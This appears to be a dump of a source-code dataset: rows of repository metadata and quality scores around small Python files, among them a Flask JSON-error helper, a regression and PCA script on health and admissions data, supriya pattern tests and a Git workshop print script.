hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
dd844765bb80e28d6b16d87fdea78b3aa78bd53e
| 103
|
py
|
Python
|
scripts/addons/animation_nodes/base_types/effects/__init__.py
|
Tilapiatsu/blender-custom_conf
|
05592fedf74e4b7075a6228b8448a5cda10f7753
|
[
"MIT"
] | 2
|
2020-04-16T22:12:40.000Z
|
2022-01-22T17:18:45.000Z
|
scripts/addons/animation_nodes/base_types/effects/__init__.py
|
Tilapiatsu/blender-custom_conf
|
05592fedf74e4b7075a6228b8448a5cda10f7753
|
[
"MIT"
] | null | null | null |
scripts/addons/animation_nodes/base_types/effects/__init__.py
|
Tilapiatsu/blender-custom_conf
|
05592fedf74e4b7075a6228b8448a5cda10f7753
|
[
"MIT"
] | 2
|
2019-05-16T04:01:09.000Z
|
2020-08-25T11:42:26.000Z
|
from . code_effects import VectorizeCodeEffect, PrependCodeEffect, ReturnDefaultsOnExceptionCodeEffect
| 51.5
| 102
| 0.902913
| 7
| 103
| 13.142857
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.067961
| 103
| 1
| 103
| 103
| 0.958333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
dd8458880203c67b39b60a68b672af16d5441b01
| 139
|
py
|
Python
|
flask_app/helpers.py
|
ad3002/BasicFlaskApp
|
1604f99adeb8c771e2428e5ab6d90cc7c9cac2b5
|
[
"MIT"
] | null | null | null |
flask_app/helpers.py
|
ad3002/BasicFlaskApp
|
1604f99adeb8c771e2428e5ab6d90cc7c9cac2b5
|
[
"MIT"
] | null | null | null |
flask_app/helpers.py
|
ad3002/BasicFlaskApp
|
1604f99adeb8c771e2428e5ab6d90cc7c9cac2b5
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
import simplejson
def return_error(error):
return simplejson.dumps({"error": error})
| 15.444444
| 45
| 0.661871
| 18
| 139
| 5.055556
| 0.722222
| 0.21978
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008475
| 0.151079
| 139
| 8
| 46
| 17.375
| 0.762712
| 0.302158
| 0
| 0
| 0
| 0
| 0.053191
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
dda132453d6a5dc6fa5aea4d2aab8be742f5995b
| 106
|
py
|
Python
|
easyrepo/__init__.py
|
kobibleu/easyrepo
|
fdc3683d4a5b615c57e450e713de42598292fc74
|
[
"MIT"
] | null | null | null |
easyrepo/__init__.py
|
kobibleu/easyrepo
|
fdc3683d4a5b615c57e450e713de42598292fc74
|
[
"MIT"
] | null | null | null |
easyrepo/__init__.py
|
kobibleu/easyrepo
|
fdc3683d4a5b615c57e450e713de42598292fc74
|
[
"MIT"
] | null | null | null |
from easyrepo.interface.crud import CRUDRepository
from easyrepo.interface.paging import PagingRepository
| 35.333333
| 54
| 0.886792
| 12
| 106
| 7.833333
| 0.666667
| 0.255319
| 0.446809
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075472
| 106
| 2
| 55
| 53
| 0.959184
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
06f119ddd2b9c1647f8c543f7bf9135e39b31b67
| 7,360
|
py
|
Python
|
proyecto.py
|
Caro322/Proyecto-IA
|
606d3b615cd8af39d85c3effca6e69151f348b8d
|
[
"Apache-2.0"
] | 1
|
2021-06-08T22:14:08.000Z
|
2021-06-08T22:14:08.000Z
|
proyecto.py
|
Caro322/Proyecto-IA
|
606d3b615cd8af39d85c3effca6e69151f348b8d
|
[
"Apache-2.0"
] | null | null | null |
proyecto.py
|
Caro322/Proyecto-IA
|
606d3b615cd8af39d85c3effca6e69151f348b8d
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
#Velocidad de onda de pulso
datos = pd.read_csv('signos.csv',sep=';', header=0)
cabecera = ["Peso","Altura","Diastolica","Siastolica","Pulso","Temperatura","Muscular","Hidratacion","Huesos","VOP","Saturacion"]
datos.columns = cabecera
datos.head()
from sklearn import decomposition
from sklearn.preprocessing import StandardScaler
from sklearn.decomposition import PCA, KernelPCA
x1 = datos.values[:,0]
x2 = datos.values[:,1]
x3 = datos.values[:,2]
x4 = datos.values[:,3]
x5 = datos.values[:,4]
x6 = datos.values[:,5]
x7 = datos.values[:,6]
x8 = datos.values[:,7]
x9 = datos.values[:,8]
y = datos.values[:,9]
x10 = datos.values[:,10]
x0 = np.ones(x1.shape)
X = np.matrix([x0,x1,x2,x3,x4,x5,x6,x7,x8,x9,x10]).T
Y = np.matrix ([y]).T
type(X)
scaler = StandardScaler()
scaler.fit(X)
X = scaler.transform(X)
pca = decomposition.PCA(n_components=3,whiten=True,svd_solver='arpack')
pca.fit(X)
X = pca.transform(X)
#Regresión utilizando la transformada
Theta=np.linalg.inv(X.T*X)*(X.T)*Y
print(Theta)
plt.plot(x1,y,'bo')
plt.plot(x1, Theta[0,0]+Theta[1,0]*x1+Theta[2,0]*x2+Theta[3,0]*x3+Theta[4,0]*x4+Theta[5,0]*x5+Theta[6,0]*x6+Theta[7,0]*x7+Theta[8,0]*x8+Theta[9,0]*x9+Theta[10,0]*x10)
plt.title('Final')
plt.show()
R=np.corrcoef((Theta[0,0]+Theta[1,0]*x1+Theta[2,0]*x2+Theta[3,0]*x3+Theta[4,0]*x4+Theta[5,0]*x5+Theta[6,0]*x6+Theta[7,0]*x7+Theta[8,0]*x8+Theta[9,0]*x9+Theta[10,0]*x10),y)
R2=R**2
print(R2[0,1])
#Regresión lineal
from sklearn import linear_model
from sklearn.metrics import mean_squared_error, r2_score
partition=15000
X_train = X[:partition]
X_test = X[partition:]
y_train = Y[:partition]
y_test = Y[partition:]
regr = linear_model.LinearRegression()
regr.fit(X_train, y_train)
y_pred = regr.predict(X_test)
print('Coeficientes:', regr.coef_)
print('Mean squared error: %.2f'
% mean_squared_error(y_test, y_pred))
print('Coeficiente de determinación: %.2f'
% r2_score(y_test, y_pred))
#Regresión con máquina de soporte vectorial
from sklearn import svm
from sklearn.metrics import mean_squared_error, r2_score
X_train = X[:partition]
X_test = X[partition:]
y_train = Y[:partition]
y_test = Y[partition:]
msv = svm.SVR(kernel='linear')
msv.fit(X_train, y_train)
y_pred = msv.predict(X_test)
print('Coeficientes:', msv.coef_)
print('Mean squared error: %.2f'
% mean_squared_error(y_test, y_pred))
print('Coeficiente de determinación: %.2f'
% r2_score(y_test, y_pred))
msv = svm.SVR(kernel='rbf')
msv.fit(X_train, y_train)
y_pred = msv.predict(X_test)
print('Mean squared error: %.2f'
% mean_squared_error(y_test, y_pred))
print('Coeficiente de determinación: %.2f'
% r2_score(y_test, y_pred))
msv = svm.SVR(kernel='poly',degree=2)
msv.fit(X_train, y_train)
y_pred = msv.predict(X_test)
print('Mean squared error: %.2f'
% mean_squared_error(y_test, y_pred))
print('Coeficiente de determinación: %.2f'
% r2_score(y_test, y_pred))
msv = svm.SVR(kernel='poly',degree=3)
msv.fit(X_train, y_train)
y_pred = msv.predict(X_test)
print('Mean squared error: %.2f'
% mean_squared_error(y_test, y_pred))
print('Coeficiente de determinación: %.2f'
% r2_score(y_test, y_pred))
#Regresión con redes neuronales
from sklearn.neural_network import MLPRegressor
from sklearn.metrics import mean_squared_error, r2_score
X_train = X[:partition]
X_test = X[partition:]
y_train = Y[:partition]
y_test = Y[partition:]
regr = MLPRegressor(random_state=1, max_iter=500).fit(X_train, y_train)
regr.fit(X_train, y_train)
y_pred = regr.predict(X_test)
print('Mean squared error: %.2f'
% mean_squared_error(y_test, y_pred))
print('Coeficiente de determinación: %.2f'
% r2_score(y_test, y_pred))
#Predicción de admisión a la universidad
datos = pd.read_csv('Admission_Predict.csv',sep=',', header=0)
cabecera = ["Serial","GRE","TOEFL","UniRating","Proposito","Recomendacion","GPA","Experiencia","P_Admisión"]
datos.columns = cabecera
datos.head()
datos.drop(["Serial"],axis=1,inplace=True)
datos.head()
from sklearn import decomposition
from sklearn.preprocessing import StandardScaler
from sklearn.decomposition import PCA, KernelPCA
x1 = datos.values[:,0]
x2 = datos.values[:,1]
x3 = datos.values[:,2]
x4 = datos.values[:,3]
x5 = datos.values[:,4]
x6 = datos.values[:,5]
x7 = datos.values[:,6]
y = datos.values[:,7]
x0 = np.ones(x1.shape)
X = np.matrix([x0,x1,x2,x3,x4,x5,x6,x7]).T
Y = np.matrix ([y]).T
scaler = StandardScaler()
scaler.fit(X)
X = scaler.transform(X)
pca = decomposition.PCA(n_components=3,whiten=True,svd_solver='arpack')
pca.fit(X)
X = pca.transform(X)
#Regresión utilizando la transformada
Theta=np.linalg.inv(X.T*X)*(X.T)*Y
print(Theta)
plt.plot(x1,y,'bo')
plt.plot(x1, Theta[0,0]+Theta[1,0]*x1+Theta[2,0]*x2+Theta[3,0]*x3+Theta[4,0]*x4+Theta[5,0]*x5+Theta[6,0]*x6+Theta[7,0]*x7)
plt.title('Final')
plt.show()
R=np.corrcoef((Theta[0,0]+Theta[1,0]*x1+Theta[2,0]*x2+Theta[3,0]*x3+Theta[4,0]*x4+Theta[5,0]*x5+Theta[6,0]*x6+Theta[7,0]*x7),y)
R2=R**2
print(R2[0,1])
#Regresión lineal
from sklearn import linear_model
from sklearn.metrics import mean_squared_error, r2_score
partition=300
X_train = X[:partition]
X_test = X[partition:]
y_train = Y[:partition]
y_test = Y[partition:]
regr = linear_model.LinearRegression()
regr.fit(X_train, y_train)
y_pred = regr.predict(X_test)
print('Coeficientes:', regr.coef_)
print('Mean squared error: %.2f'
% mean_squared_error(y_test, y_pred))
print('Coeficiente de determinación: %.2f'
% r2_score(y_test, y_pred))
#Regresión con máquinas de soporte vectorial
from sklearn import svm
from sklearn.metrics import mean_squared_error, r2_score
X_train = X[:partition]
X_test = X[partition:]
y_train = Y[:partition]
y_test = Y[partition:]
msv = svm.SVR(kernel='linear')
msv.fit(X_train, y_train)
y_pred = msv.predict(X_test)
print('Coeficientes:', msv.coef_)
print('Mean squared error: %.2f'
% mean_squared_error(y_test, y_pred))
print('Coeficiente de determinación: %.2f'
% r2_score(y_test, y_pred))
msv = svm.SVR(kernel='rbf')
msv.fit(X_train, y_train)
y_pred = msv.predict(X_test)
print('Mean squared error: %.2f'
% mean_squared_error(y_test, y_pred))
print('Coeficiente de determinación: %.2f'
% r2_score(y_test, y_pred))
msv = svm.SVR(kernel='poly',degree=2)
msv.fit(X_train, y_train)
y_pred = msv.predict(X_test)
print('Mean squared error: %.2f'
% mean_squared_error(y_test, y_pred))
print('Coeficiente de determinación: %.2f'
% r2_score(y_test, y_pred))
msv = svm.SVR(kernel='poly',degree=3)
msv.fit(X_train, y_train)
y_pred = msv.predict(X_test)
print('Mean squared error: %.2f'
% mean_squared_error(y_test, y_pred))
print('Coeficiente de determinación: %.2f'
% r2_score(y_test, y_pred))
#Regresión con redes neuronales
from sklearn.neural_network import MLPRegressor
from sklearn.metrics import mean_squared_error, r2_score
X_train = X[:partition]
X_test = X[partition:]
y_train = Y[:partition]
y_test = Y[partition:]
regr = MLPRegressor(random_state=1, max_iter=500).fit(X_train, y_train)
regr.fit(X_train, y_train)
y_pred = regr.predict(X_test)
print('Mean squared error: %.2f'
% mean_squared_error(y_test, y_pred))
print('Coeficiente de determinación: %.2f'
% r2_score(y_test, y_pred))
| 23
| 171
| 0.711549
| 1,248
| 7,360
| 4.036058
| 0.125
| 0.035736
| 0.095295
| 0.047647
| 0.910264
| 0.892198
| 0.887433
| 0.887433
| 0.887433
| 0.887433
| 0
| 0.03974
| 0.121332
| 7,360
| 319
| 172
| 23.0721
| 0.739137
| 0.042663
| 0
| 0.890547
| 0
| 0
| 0.142126
| 0.002985
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.104478
| 0
| 0.104478
| 0.159204
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
660a5d55180e6ccbe13c13a8a904ad05e80efd38
| 14,355
|
py
|
Python
|
tests/patterns/test_patterns_Ppar___iter__.py
|
butayama/supriya
|
0c197324ecee4232381221880d1f40e109bb756c
|
[
"MIT"
] | null | null | null |
tests/patterns/test_patterns_Ppar___iter__.py
|
butayama/supriya
|
0c197324ecee4232381221880d1f40e109bb756c
|
[
"MIT"
] | null | null | null |
tests/patterns/test_patterns_Ppar___iter__.py
|
butayama/supriya
|
0c197324ecee4232381221880d1f40e109bb756c
|
[
"MIT"
] | null | null | null |
import pytest
import uqbar.strings
import supriya.patterns
pattern_01 = supriya.patterns.Ppar(
[
supriya.patterns.Pbind(
amplitude=1.0,
duration=1.0,
frequency=supriya.patterns.Pseq([1001, 1002, 1003], 1),
)
]
)
pattern_02 = supriya.patterns.Ppar(
[
supriya.patterns.Pbind(
amplitude=1.0,
duration=1.0,
frequency=supriya.patterns.Pseq([1001, 1002], 1),
),
supriya.patterns.Pmono(
amplitude=1.0,
duration=0.75,
frequency=supriya.patterns.Pseq([2001, 2002, 2003], 1),
),
]
)
pattern_03 = supriya.patterns.Ppar(
[
supriya.patterns.Pbind(
amplitude=1.0,
duration=1.0,
frequency=supriya.patterns.Pseq([1001, 1002, 1003], 1),
),
supriya.patterns.Pbind(
amplitude=1.0, duration=0.75, frequency=supriya.patterns.Pseq([], 1)
),
]
)
pattern_04 = supriya.patterns.Ppar(
[
supriya.patterns.Pbus(
supriya.patterns.Pbind(
amplitude=1.0,
duration=0.75,
frequency=supriya.patterns.Pseq([1001, 1002, 1003], 1),
)
)
]
)
pattern_05 = supriya.patterns.Ppar(
[
supriya.patterns.Pbus(
supriya.patterns.Pbind(
amplitude=1.0,
duration=1.0,
frequency=supriya.patterns.Pseq([1001, 1002], 1),
)
),
supriya.patterns.Pbus(
supriya.patterns.Pmono(
amplitude=1.0,
duration=0.75,
frequency=supriya.patterns.Pseq([2001, 2002, 2003], 1),
)
),
]
)
pattern_06 = supriya.patterns.Ppar(
[
supriya.patterns.Pgpar(
[
[
supriya.patterns.Pbind(
delta=10,
duration=10,
frequency=supriya.patterns.Pseq([1001, 1002, 1003]),
),
supriya.patterns.Pbind(
delta=12,
duration=10,
frequency=supriya.patterns.Pseq([2001, 2002, 2003]),
),
]
]
),
supriya.patterns.Pgpar(
[
[
supriya.patterns.Pbind(
delta=10,
duration=10,
frequency=supriya.patterns.Pseq([3001, 3002]),
),
supriya.patterns.Pbind(
delta=12,
duration=10,
frequency=supriya.patterns.Pseq([4001, 4002]),
),
]
]
),
]
)
def test___iter___01():
events = list(pattern_01)
assert pytest.helpers.get_objects_as_string(
events, replace_uuids=True
) == uqbar.strings.normalize(
"""
NoteEvent(
amplitude=1.0,
delta=1.0,
duration=1.0,
frequency=1001,
uuid=UUID('A'),
)
NoteEvent(
amplitude=1.0,
delta=1.0,
duration=1.0,
frequency=1002,
uuid=UUID('B'),
)
NoteEvent(
amplitude=1.0,
delta=1.0,
duration=1.0,
frequency=1003,
uuid=UUID('C'),
)
"""
)
def test___iter___02():
events = list(pattern_02)
assert pytest.helpers.get_objects_as_string(
events, replace_uuids=True
) == uqbar.strings.normalize(
"""
NoteEvent(
amplitude=1.0,
delta=0.0,
duration=1.0,
frequency=1001,
uuid=UUID('A'),
)
NoteEvent(
amplitude=1.0,
delta=0.75,
duration=0.75,
frequency=2001,
is_stop=False,
uuid=UUID('B'),
)
NoteEvent(
amplitude=1.0,
delta=0.25,
duration=0.75,
frequency=2002,
is_stop=False,
uuid=UUID('B'),
)
NoteEvent(
amplitude=1.0,
delta=0.5,
duration=1.0,
frequency=1002,
uuid=UUID('C'),
)
NoteEvent(
amplitude=1.0,
delta=0.75,
duration=0.75,
frequency=2003,
uuid=UUID('B'),
)
"""
)
def test___iter___03():
events = list(pattern_03)
assert pytest.helpers.get_objects_as_string(
events, replace_uuids=True
) == uqbar.strings.normalize(
"""
NoteEvent(
amplitude=1.0,
delta=1.0,
duration=1.0,
frequency=1001,
uuid=UUID('A'),
)
NoteEvent(
amplitude=1.0,
delta=1.0,
duration=1.0,
frequency=1002,
uuid=UUID('B'),
)
NoteEvent(
amplitude=1.0,
delta=1.0,
duration=1.0,
frequency=1003,
uuid=UUID('C'),
)
"""
)
def test___iter___04():
events = list(pattern_04)
assert pytest.helpers.get_objects_as_string(
events, replace_uuids=True
) == uqbar.strings.normalize(
"""
CompositeEvent(
events=(
BusEvent(
calculation_rate=CalculationRate.AUDIO,
channel_count=2,
uuid=UUID('A'),
),
GroupEvent(
uuid=UUID('B'),
),
SynthEvent(
add_action=AddAction.ADD_AFTER,
amplitude=1.0,
fade_time=0.25,
in_=UUID('A'),
synthdef=<SynthDef: system_link_audio_2>,
target_node=UUID('B'),
uuid=UUID('C'),
),
),
)
NoteEvent(
amplitude=1.0,
delta=0.75,
duration=0.75,
frequency=1001,
out=UUID('A'),
target_node=UUID('B'),
uuid=UUID('D'),
)
NoteEvent(
amplitude=1.0,
delta=0.75,
duration=0.75,
frequency=1002,
out=UUID('A'),
target_node=UUID('B'),
uuid=UUID('E'),
)
NoteEvent(
amplitude=1.0,
delta=0.75,
duration=0.75,
frequency=1003,
out=UUID('A'),
target_node=UUID('B'),
uuid=UUID('F'),
)
CompositeEvent(
events=(
SynthEvent(
is_stop=True,
uuid=UUID('C'),
),
NullEvent(
delta=0.25,
),
GroupEvent(
is_stop=True,
uuid=UUID('B'),
),
BusEvent(
calculation_rate=None,
channel_count=None,
is_stop=True,
uuid=UUID('A'),
),
),
is_stop=True,
)
"""
)
def test___iter___05():
events = list(pattern_05)
assert pytest.helpers.get_objects_as_string(
events, replace_uuids=True
) == uqbar.strings.normalize(
"""
CompositeEvent(
events=(
BusEvent(
calculation_rate=CalculationRate.AUDIO,
channel_count=2,
uuid=UUID('A'),
),
GroupEvent(
uuid=UUID('B'),
),
SynthEvent(
add_action=AddAction.ADD_AFTER,
amplitude=1.0,
fade_time=0.25,
in_=UUID('A'),
synthdef=<SynthDef: system_link_audio_2>,
target_node=UUID('B'),
uuid=UUID('C'),
),
),
)
NoteEvent(
amplitude=1.0,
delta=0.0,
duration=1.0,
frequency=1001,
out=UUID('A'),
target_node=UUID('B'),
uuid=UUID('D'),
)
CompositeEvent(
events=(
BusEvent(
calculation_rate=CalculationRate.AUDIO,
channel_count=2,
uuid=UUID('E'),
),
GroupEvent(
uuid=UUID('F'),
),
SynthEvent(
add_action=AddAction.ADD_AFTER,
amplitude=1.0,
fade_time=0.25,
in_=UUID('E'),
synthdef=<SynthDef: system_link_audio_2>,
target_node=UUID('F'),
uuid=UUID('G'),
),
),
)
NoteEvent(
amplitude=1.0,
delta=0.75,
duration=0.75,
frequency=2001,
is_stop=False,
out=UUID('E'),
target_node=UUID('F'),
uuid=UUID('H'),
)
NoteEvent(
amplitude=1.0,
delta=0.25,
duration=0.75,
frequency=2002,
is_stop=False,
out=UUID('E'),
target_node=UUID('F'),
uuid=UUID('H'),
)
NoteEvent(
amplitude=1.0,
delta=0.5,
duration=1.0,
frequency=1002,
out=UUID('A'),
target_node=UUID('B'),
uuid=UUID('I'),
)
NoteEvent(
amplitude=1.0,
delta=0.5,
duration=0.75,
frequency=2003,
out=UUID('E'),
target_node=UUID('F'),
uuid=UUID('H'),
)
CompositeEvent(
delta=0.25,
events=(
SynthEvent(
is_stop=True,
uuid=UUID('C'),
),
NullEvent(
delta=0.25,
),
GroupEvent(
is_stop=True,
uuid=UUID('B'),
),
BusEvent(
calculation_rate=None,
channel_count=None,
is_stop=True,
uuid=UUID('A'),
),
),
is_stop=True,
)
CompositeEvent(
events=(
SynthEvent(
is_stop=True,
uuid=UUID('G'),
),
NullEvent(
delta=0.25,
),
GroupEvent(
is_stop=True,
uuid=UUID('F'),
),
BusEvent(
calculation_rate=None,
channel_count=None,
is_stop=True,
uuid=UUID('E'),
),
),
is_stop=True,
)
"""
)
def test___iter___06():
events = list(pattern_06)
assert pytest.helpers.get_objects_as_string(
events, replace_uuids=True
) == uqbar.strings.normalize(
"""
CompositeEvent(
events=(
GroupEvent(
add_action=AddAction.ADD_TO_TAIL,
uuid=UUID('A'),
),
),
)
NoteEvent(
delta=0.0,
duration=10,
frequency=1001,
target_node=UUID('A'),
uuid=UUID('B'),
)
NoteEvent(
delta=0.0,
duration=10,
frequency=2001,
target_node=UUID('A'),
uuid=UUID('C'),
)
CompositeEvent(
events=(
GroupEvent(
add_action=AddAction.ADD_TO_TAIL,
uuid=UUID('D'),
),
),
)
NoteEvent(
delta=0.0,
duration=10,
frequency=3001,
target_node=UUID('D'),
uuid=UUID('E'),
)
NoteEvent(
delta=10.0,
duration=10,
frequency=4001,
target_node=UUID('D'),
uuid=UUID('F'),
)
NoteEvent(
delta=0.0,
duration=10,
frequency=1002,
target_node=UUID('A'),
uuid=UUID('G'),
)
NoteEvent(
delta=2.0,
duration=10,
frequency=3002,
target_node=UUID('D'),
uuid=UUID('H'),
)
NoteEvent(
delta=0.0,
duration=10,
frequency=2002,
target_node=UUID('A'),
uuid=UUID('I'),
)
NoteEvent(
delta=8.0,
duration=10,
frequency=4002,
target_node=UUID('D'),
uuid=UUID('J'),
)
NoteEvent(
delta=4.0,
duration=10,
frequency=1003,
target_node=UUID('A'),
uuid=UUID('K'),
)
NoteEvent(
delta=0.0,
duration=10,
frequency=2003,
target_node=UUID('A'),
uuid=UUID('L'),
)
CompositeEvent(
delta=12.0,
events=(
NullEvent(
delta=0.25,
),
GroupEvent(
is_stop=True,
uuid=UUID('D'),
),
),
is_stop=True,
)
CompositeEvent(
events=(
NullEvent(
delta=0.25,
),
GroupEvent(
is_stop=True,
uuid=UUID('A'),
),
),
is_stop=True,
)
"""
)
| 25.184211
| 80
| 0.386834
| 1,181
| 14,355
| 4.573243
| 0.086367
| 0.075542
| 0.0611
| 0.070357
| 0.903536
| 0.891131
| 0.840955
| 0.79763
| 0.77967
| 0.758378
| 0
| 0.07606
| 0.503588
| 14,355
| 569
| 81
| 25.228471
| 0.681869
| 0
| 0
| 0.546763
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.043165
| 1
| 0.043165
| false
| 0
| 0.021583
| 0
| 0.064748
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b0f584336fc64f91a4256b51628697a8e3ffc2f0
| 121
|
py
|
Python
|
Apurv.py
|
Thepetapixl/Git-Github-Oct7-2020
|
94bc1409a28602c45b1b6af3bd5696cf31384461
|
[
"MIT"
] | null | null | null |
Apurv.py
|
Thepetapixl/Git-Github-Oct7-2020
|
94bc1409a28602c45b1b6af3bd5696cf31384461
|
[
"MIT"
] | null | null | null |
Apurv.py
|
Thepetapixl/Git-Github-Oct7-2020
|
94bc1409a28602c45b1b6af3bd5696cf31384461
|
[
"MIT"
] | 21
|
2020-10-07T11:56:32.000Z
|
2020-10-07T12:13:54.000Z
|
print("=============================")
print("\n Welcome to Github Basics! \n")
print("=============================")
| 20.166667
| 40
| 0.31405
| 9
| 121
| 4.222222
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
